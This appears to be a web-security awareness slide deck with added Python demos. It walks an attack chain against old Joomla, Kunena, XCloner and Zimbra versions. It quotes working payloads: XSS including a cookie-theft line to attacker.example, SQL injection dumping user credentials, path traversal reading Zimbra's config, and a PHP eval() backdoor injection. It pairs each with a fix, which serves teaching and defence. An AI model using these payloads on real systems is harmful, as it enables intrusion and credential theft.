The Web you thought you knew
By Munir Njiru and Ruth Macharia
Web Security Please?
● Most people don't think it's relevant. Why?
– You either can't comprehend someone attacking you.
– You have no idea about attacks.
OWASP top 10
● Glad I got your attention.
● There are guys that have tried to open your eyes by creating awareness of this: OWASP (the Open Web Application Security Project).
● They have ten categories for these attacks, but I will not bore you with all that talk, so get more info here: https://www.owasp.org/index.php/Top_10_2013-Top_10
Don't be illusioned!!
The web can't be covered in a day. Bear with this: it's the tip of the iceberg, but relevant. If we could cover it all, you'd feel this:
So what's the worst?
Why should I care? What could these breaches possibly do, you ask? Well:
● You could lose your webutation (your reputation on the web).
● You could lose cash.
● You could have your secrets exposed.
● And for admins, you could involuntarily sign a power-sharing agreement with the attacker, and we know you don't like that.
This list is not comprehensive; if you are holding your breath, keep holding it :)
Disclaimer
You will see the worst, jumbled stuff on screen when an attack is carried out, but don't panic at all the technical jargon; just look at the results the jargon produces and the answer to what was happening will come.
I made a Mistake How?
Let us tell this as a story. You will see how easily people fit into the OWASP Top 10, maybe not everywhere, but in enough places to render you done for:
I made a Mistake How?
So the IT Manager had a proposal: a dynamic site built on today's technology plus a robust mail server for communication. Here are his specifications:
● Dynamic content management on a robust platform (Joomla)
● A backup system based on XCloner
● A forum based on Kunena to enable interaction between staff and clients
● A Zimbra server for mail handling
I made a Mistake How?
He missed, however, checking the security of the proposed system, and the version information led to this site's demise.
Let me save you the headache of his version information. Recon, as spoken of earlier, got us this:
- Joomla 1.5.15
- Xcloner 2.1
- Kunena 1.6.1
- Zimbra 8.0.2
XSS
Well, this is the ability for an attacker to diss you using your own browser.
It's basically the ability to add code to what you see, and this code is not usually added in your best interest.
Your Browser Dissed You!
Payload => <script>alert("I said it was just an XSS what's the worst that could happen? \n Then the hackers at Africahackon went straight for my cookie jar and found all my secrets: \n\n" );</script>
Your Browser Dissed You!
Demo
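Added example, not code from the slides or from Joomla/Kunena: a small Python model of a search page that reflects the query into its HTML. The vulnerable renderer pastes the parameter in raw, so the slide's alert-box payload becomes a live script; the fixed renderer HTML-escapes it first. The cookie-stealing variant, the attacker.example host and the session cookie header are constructed for illustration (the slide only mentions the "cookie jar"), and the HttpOnly flag is the defence-in-depth that keeps document.cookie empty even when an XSS does get through.

```python
import html
import re

# Constructed payload, same idea as the slide's alert box: it only proves that script runs.
ALERT_PAYLOAD = '<script>alert("I said it was just an XSS, what\'s the worst that could happen?");</script>'

# Constructed payload: what the "cookie jar" raid looks like. attacker.example is a placeholder host.
COOKIE_THIEF = '<img src=x onerror="new Image().src=\'http://attacker.example/c?\'+document.cookie">'

# A real tag that is either <script ...> or carries an inline on* event handler.
SCRIPT_OR_HANDLER = re.compile(r"<script|<\w+[^>]*\son\w+\s*=", re.IGNORECASE)


def render_search_vulnerable(query: str) -> str:
    """Reflects the query straight into the page: the browser parses attacker markup as markup."""
    return f"<h2>Results for {query}</h2>"


def render_search_fixed(query: str) -> str:
    """Same page, but the query is HTML-escaped, so <, >, & and quotes become harmless entities."""
    return f"<h2>Results for {html.escape(query, quote=True)}</h2>"


def executes_markup(page: str) -> bool:
    """Crude check on the rendered page: is there a script tag or a tag with an inline handler?"""
    return SCRIPT_OR_HANDLER.search(page) is not None


def session_cookie(value: str, http_only: bool = True) -> str:
    """Set-Cookie header for the session (constructed). HttpOnly hides the cookie from
    document.cookie, so the cookie-theft payload gets nothing even if an XSS slips through."""
    attrs = ["Path=/", "Secure", "SameSite=Lax"]
    if http_only:
        attrs.append("HttpOnly")
    return "Set-Cookie: session=" + value + "; " + "; ".join(attrs)


if __name__ == "__main__":
    for payload in (ALERT_PAYLOAD, COOKIE_THIEF):
        print("vulnerable executes markup:", executes_markup(render_search_vulnerable(payload)))
        print("fixed executes markup:     ", executes_markup(render_search_fixed(payload)))
    print(session_cookie("abc123"))
```

Escaping on output is the fix the slide's "validate the data" advice boils down to for XSS: the query is still accepted, it just can never be interpreted as HTML. The cookie flag does not stop the XSS itself; it only limits what a successful one can steal.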
SQL Injection
First of all, you don't need to go through a medicine class to get this.
In layman's terms, it is the ability to sweet-talk your database so that it gives everything up!!!
I just saw my Name!!!!
Payload => %' and 1=2) union select 1, concat(0x3a,username,0x3a,email,0x3a,0x3a,activation),concat(0x3a,username,0x3a,email,0x3a,password,0x3a,activation),'Super Administrator','email','2009-11-26 22:09:28','2009-11-26 22:09:28',62,1,1,0,0,0,1,15 from jos_users-- ;
I just saw my Name!!!!
Demo
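Added example, not code from the slides or from Kunena: a Python/SQLite model of the query shape the slide's payload abuses. The payload works because the search term is glued into `... LIKE '%<term>%')`: the leading `%'` and `)` close the pattern and the parenthesis, `and 1=2` empties the real result, `union select` with the same column count as the original query (fifteen on the slide, two here) pulls rows from jos_users, `concat(0x3a, ...)` joins username, email and password hash with ':' (0x3a) so they land in a column the page renders, and `--` comments out the trailing `%')`. The tables, rows and password hash below are constructed stand-ins, and the SQLite `||` operator replaces MySQL's concat().

```python
import sqlite3

# Constructed injection: the slide's technique with two columns and SQLite syntax.
# 0x3a on the slide is just ':'; MySQL's concat(...) is '||' here.
INJECTION = (
    "%' AND 1=2) UNION SELECT id, username || ':' || email || ':' || password "
    "FROM jos_users-- "
)


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the Joomla/Kunena tables (not real data)."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE jos_users (id INTEGER, username TEXT, email TEXT, password TEXT);
        INSERT INTO jos_users VALUES
            (62, 'admin', 'admin@example.test', '5f4dcc3b5aa765d61d8327deb882cf99:d0Ba');
        CREATE TABLE jos_kunena_messages (id INTEGER, subject TEXT);
        INSERT INTO jos_kunena_messages VALUES (1, 'Welcome to the forum');
        INSERT INTO jos_kunena_messages VALUES (2, 'Office closed on Friday');
        """
    )
    return con


def search_vulnerable(con: sqlite3.Connection, term: str):
    """String-built query, the pattern behind the slide's payload: the closing %' and )
    hand the attacker the rest of the statement, and a UNION reads any table the
    database user can see."""
    sql = "SELECT id, subject FROM jos_kunena_messages WHERE (subject LIKE '%" + term + "%')"
    return con.execute(sql).fetchall()


def search_fixed(con: sqlite3.Connection, term: str):
    """Parameterised query: the driver sends the term as data, never as SQL text,
    so quotes and parentheses in it cannot change the statement."""
    sql = "SELECT id, subject FROM jos_kunena_messages WHERE (subject LIKE ?)"
    return con.execute(sql, ("%" + term + "%",)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", search_vulnerable(db, INJECTION))   # admin row leaks
    print("fixed:     ", search_fixed(db, INJECTION))        # no rows
    print("normal:    ", search_fixed(db, "welcome"))        # the forum post
```

The parameterised version is the whole fix; escaping quotes by hand is the road that LIKE patterns, numeric fields and second-order injection all break.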
Information Disclosure
It's technically giving information to anyone who asks for it...
Payload => task=info
Information Disclosure
Demo
LFI
This is basically the ability to read files within the system (Local File Inclusion).
If you are thinking "big deal, so what?", just chill; you will be answered.
Waiiittt the mail tooo???
Waiiittt the mail tooo???
Payload => res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
Waiiittt the mail tooo???
Demo
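Added example, not code from the slides or from Zimbra: a Python model of the two ingredients in the `skin=` payload above, directory traversal (`../` repeated until it reaches `/`) and a `%00` null byte that makes old C-style string handling drop whatever file name the application appends. The skin directory, the appended `skin.properties` name and the way the path is assembled are assumptions for illustration; the slides do not show Zimbra's internals. The hardened version allow-lists the skin name, rejects the null byte and checks the normalised path is still under the skin directory.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed skin directory; the real layout inside Zimbra is not shown on the slides.
SKIN_BASE = "/opt/zimbra/jetty/webapps/zimbra/skins"

# The skin value from the slide's payload: traversal plus %00 to drop the appended file name.
PAYLOAD_SKIN = "../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"

# Allow-list for a skin name: letters, digits, underscore, hyphen. No slashes, no dots.
SKIN_NAME = re.compile(r"[A-Za-z0-9_-]+")


def vulnerable_skin_file(skin: str) -> str:
    """Model of the bug: decode, glue onto the base path, append the expected file name.
    The NUL from %00 is where C/old-PHP string handling stops reading, so the appended
    name is silently dropped, and normalisation then walks out of the skin directory."""
    raw = posixpath.join(SKIN_BASE, unquote(skin), "skin.properties")
    truncated = raw.split("\x00", 1)[0]
    return posixpath.normpath(truncated)


def safe_skin_file(skin: str) -> str:
    """Hardened version: allow-list the name, reject NUL, and verify the normalised path
    still lives under SKIN_BASE (belt and braces; the allow-list already excludes '..')."""
    decoded = unquote(skin)
    if "\x00" in decoded or not SKIN_NAME.fullmatch(decoded):
        raise ValueError("skin name rejected: " + repr(decoded))
    path = posixpath.normpath(posixpath.join(SKIN_BASE, decoded, "skin.properties"))
    if posixpath.commonpath([path, SKIN_BASE]) != SKIN_BASE:
        raise ValueError("path escapes skin directory: " + path)
    return path


if __name__ == "__main__":
    print("vulnerable resolves to:", vulnerable_skin_file(PAYLOAD_SKIN))   # the config file
    print("safe, normal skin:     ", safe_skin_file("carbon"))
    try:
        safe_skin_file(PAYLOAD_SKIN)
    except ValueError as err:
        print("safe, payload:         ", err)
```

In production code, resolve symlinks (os.path.realpath) before the containment check, and treat the allow-list as the primary control: a path comparison alone still lets an attacker read any file that happens to sit under the base directory.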
See it in Action!!!!
To see this done manually, without the script, check our video to get the gist of the background:
http://www.youtube.com/watch?v=ahJLYT8CLow
RCE
Just when you thought we were done :D Well, you were warned; the web is wide, but we will be winding up in a bit.
RCE: it's not "Regional Centers of Expertise", it's Remote Code Execution.
What Just Happened???
Payload => ?task=step2&output_url_pref=';+}+?>+<?php+eval($_GET['africahackon']);+?>&output_path=../../../../
What Just Happened???
Demo
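Added example, not code from the slides or from XCloner: a Python model of the string break-out in the `output_url_pref` value above. A setting gets written into a PHP file that the application later loads, by pasting the raw value between quotes; the payload's leading `';` closes that string and statement, the `}` closes an enclosing block, `?>` leaves PHP mode and `<?php eval($_GET['africahackon']); ?>` opens a fresh block that runs whatever the attacker sends in the africahackon parameter. The config file layout here is an assumption, and the `output_path=../../../../` half of the payload (which aims the write outside the component directory, the same traversal trick as the LFI above) is not modelled. The scanner blanks out single-quoted literals to show where the eval() ends up.

```python
# The output_url_pref value from the slide: closes the quoted string, then opens a new PHP block.
PAYLOAD = "'; } ?> <?php eval($_GET['africahackon']); ?>"


def write_config_vulnerable(output_url_pref: str) -> str:
    """Model of the bug: a user-controlled setting is pasted into PHP source that the app
    later include()s. The file layout is assumed; only the interpolation pattern matters."""
    return "<?php\n$_CONFIG['output_url_pref'] = '" + output_url_pref + "';\n"


def php_single_quoted(value: str) -> str:
    """Escape for a PHP single-quoted literal: only backslash and the quote are special
    there (PHP's own var_export() produces the same form)."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def write_config_fixed(output_url_pref: str) -> str:
    """Same file, but the value is emitted as a proper literal, so a quote in it stays data."""
    return "<?php\n$_CONFIG['output_url_pref'] = " + php_single_quoted(output_url_pref) + ";\n"


def code_outside_strings(php_src: str) -> str:
    """Blank out every single-quoted literal (honouring \\' and \\\\ inside it) and return
    what is left, i.e. the text PHP would treat as code. A simplification: double quotes,
    comments and ?> mode switches are ignored, which is enough to show where eval() lands."""
    out, i, in_str = [], 0, False
    while i < len(php_src):
        c = php_src[i]
        if in_str:
            if c == "\\":
                i += 2          # escaped character stays inside the literal
                continue
            if c == "'":
                in_str = False
            i += 1
            continue
        if c == "'":
            in_str = True
        else:
            out.append(c)
        i += 1
    return "".join(out)


def injects_code(php_src: str) -> bool:
    """True when an eval() call sits outside every string literal, i.e. it would execute."""
    return "eval(" in code_outside_strings(php_src)


if __name__ == "__main__":
    for label, writer in (("vulnerable", write_config_vulnerable), ("fixed", write_config_fixed)):
        src = writer(PAYLOAD)
        print(label, "config:\n" + src)
        print(label, "code seen by PHP:", repr(code_outside_strings(src)))
        print(label, "injects code:", injects_code(src))
```

Escaping fixes the break-out, but the better design is not to generate executable PHP from user input at all: store settings as JSON or ini data and parse them, and never let a request choose where that file is written.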
Remediation
● This would all have been avoided if:
– Data was validated on the platform (and output encoded before it is rendered).
– The technology was investigated before being implemented, and kept up to date afterwards.
Questions
● Don't be ashamed to scratch your head after this; I would too. It's a lot of information.
Contact Us
THANK YOU